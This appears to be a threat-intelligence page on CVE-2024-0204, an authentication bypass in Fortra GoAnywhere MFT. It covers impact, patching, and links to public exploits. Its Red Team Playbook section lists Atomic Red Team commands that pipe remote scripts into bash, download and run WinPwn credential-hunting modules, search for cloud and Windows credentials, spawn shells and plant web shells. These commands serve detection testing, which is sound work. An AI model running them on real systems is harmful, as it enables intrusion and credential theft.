CVE-2024-0204
Overview
This vulnerability is an authentication bypass affecting Fortra GoAnywhere MFT's administration portal prior to version 7.4.1. The root cause lies in improper access control validation within the administrative user creation functionality, allowing unauthorized requests to bypass authentication checks. The affected component is the web-based administration interface responsible for managing user accounts, specifically the mechanism that handles admin user creation requests.
Vulnerability Description
Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.
Impact
An unauthenticated attacker with network access to the administration portal can create new administrative user accounts, granting full control over the GoAnywhere MFT environment. This enables unauthorized access to sensitive data and administrative functions, potentially leading to data compromise, system manipulation, and lateral movement. The vulnerability requires no user interaction or prior authentication (AV:N/AC:L/PR:N/UI:N), making exploitation straightforward and highly impactful in operational environments.
Solution
Fortra has released a security update in GoAnywhere MFT version 7.4.1 that addresses this authentication bypass vulnerability. Administrators should upgrade all affected instances to version 7.4.1 or later as detailed in the vendor advisory FI-2024-001 (https://www.fortra.com/security/advisory/fi-2024-001). No alternative workarounds are specified; applying the official patch is the recommended remediation step to restore proper authentication enforcement in the administration portal.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Fortra's GoAnywhere Managed File Transfer software is characterized by an authentication bypass that allows unauthorized users to gain administrative access through the administration portal. This flaw arises from improper validation of user credentials, which enables an attacker to create an admin account without legitimate authentication. The affected versions, particularly those prior to 7.4.1, exhibit a critical weakness in their access control mechanisms, allowing for a significant escalation of privileges. By exploiting this vulnerability, an attacker can manipulate the system, access sensitive data, and potentially disrupt operations.
Attack vectors for this vulnerability are particularly concerning due to their simplicity and the potential for widespread exploitation. An attacker could leverage automated scripts or manual techniques to interact with the administration portal, bypassing authentication checks. Given that the flaw resides in the core functionality of the software, the exploitation could occur remotely, making it accessible to attackers without requiring physical access to the network. Scenarios could include targeted attacks against organizations using the affected versions, where an adversary could create an admin account, leading to unauthorized access to critical files, user data, and system configurations. This type of exploitation could also facilitate further attacks, such as data exfiltration or ransomware deployment.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on GoAnywhere for secure file transfers. The ability for an unauthorized user to create an admin account poses significant business risks, including data breaches, loss of customer trust, and potential regulatory repercussions. Organizations may face financial losses due to remediation efforts, legal liabilities, and damage to their reputation. Additionally, the high CVSS score of 9.8 indicates that the vulnerability is critical in nature, suggesting that the likelihood of exploitation is high, and the consequences of a successful attack could be devastating. This risk is amplified in environments where sensitive data is handled, such as healthcare, finance, and government sectors, where the stakes are particularly high.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating software to the latest versions is crucial, as patches are often released to address known vulnerabilities. Implementing robust monitoring solutions can help detect unauthorized access attempts and unusual activities within the administration portal. Organizations should also enforce strict access controls, ensuring that only authorized personnel have administrative privileges. Conducting regular security audits and penetration testing can further identify potential weaknesses in the system, allowing for proactive measures to be taken before an attacker can exploit them. Additionally, educating staff about the importance of security hygiene and the risks associated with unauthorized access can foster a culture of security awareness.
In conclusion, the authentication bypass vulnerability in Fortra's GoAnywhere Managed File Transfer software represents a critical threat to organizations utilizing this platform. The ease of exploitation, combined with the severe implications of unauthorized administrative access, necessitates immediate attention and action from affected entities. By prioritizing timely updates, implementing stringent access controls, and fostering a proactive security culture, organizations can significantly reduce their risk exposure and enhance their overall security posture against such vulnerabilities.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting the authentication bypass vulnerability in Fortra’s GoAnywhere MFT. This uptick is accompanied by the emergence of new proof-of-concept exploit tools circulating publicly, broadening the accessibility of attack methods to a wider range of threat actors. While the overall exploitation trend remains stable, the availability of these tools lowers the technical barrier for adversaries, potentially accelerating unauthorized administrative access incidents. This development underscores a sustained critical threat environment, reinforcing the high risk posture associated with CVE-2024-0204. Defenders should remain vigilant as the expanded exploit landscape may facilitate more frequent and varied attack vectors, increasing the likelihood of successful compromise.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortra | Goanywhere Managed File Transfer | All |
cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:*
|
|
|
Fortra | Goanywhere Managed File Transfer | 6.0.0 |
cpe:2.3:a:fortra:goanywhere_managed_file_transfer:6.0.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Fortra GoAnywhere MFT Unauthenticated Remote Code Execution
exploits/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204
|
sfewer-r7, James Horseman, Zach Hanley | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass | İbrahimsql | remote | multiple | - | View |
GitHub PoCs (6)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
horizon3ai/CVE-2024-0204
Authentication Bypass in GoAnywhere MFT
|
horizon3ai | 65 | 10 | 2024-01-23 | View |
|
cbeek-r7/CVE-2024-0204
Scanning for vulnerable GoAnywhere MFT CVE-2024-0204
|
cbeek-r7 | 4 | 0 | 2024-01-23 | View |
|
ibrahmsql/CVE-2024-0204
Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass
|
ibrahmsql | 2 | 0 | 2025-06-15 | View |
|
m-cetin/CVE-2024-0204
This script exploits the CVE-2024-0204 vulnerability in Fortra GoAnywhere MFT, allowing the creation of unauthorized adm...
|
m-cetin | 2 | 0 | 2024-01-24 | View |
|
mindcodings/CVE-2024-0204
GoAnywhere MFT
|
mindcodings | 1 | 0 | 2024-02-04 | View |
|
adminlove520/CVE-2024-0204
GoAnywhere MFT
|
adminlove520 | 1 | 0 | 2024-02-04 | View |
Threat Feed
32 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-0204 |
| fortra.com |
GitHub CVE
vendor-advisory
|
https://www.fortra.com/security/advisory/fi-2024-001 |
| my.goanywhere.com |
GitHub CVE
permissions-required
|
https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/176683/GoAnywhere-MFT-Authentication-Bypass.html |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/176974/Fortra-GoAnywhere-MFT-Unauthenticated-Remote-Code-Execution.html |